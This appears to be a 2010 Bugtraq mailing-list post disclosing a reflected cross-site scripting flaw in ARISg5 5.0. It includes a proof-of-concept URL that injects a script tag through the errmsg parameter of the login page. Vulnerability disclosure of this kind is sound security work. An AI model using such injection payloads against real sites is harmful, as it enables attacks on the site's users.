[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201002260131.o1Q1VAkm005122@mx1.securityfocus.com>
Date: Fri, 26 Feb 2010 03:30:58 +0200
From: "Yaniv Miron" <lament@...ack.org>
To: <bugtraq@...urityfocus.com>
Subject: ARISg5 (version 5.0) cross site scripting vulnerability
Hello,
Please see the following report:
ARISg5 (version 5.0) cross site scripting vulnerability
-----------------------------------------------------------------------
Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron
Exploit:
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>
Yaniv Miron aka "Lament".
lament@...ack.org
Powered by blists - more mailing lists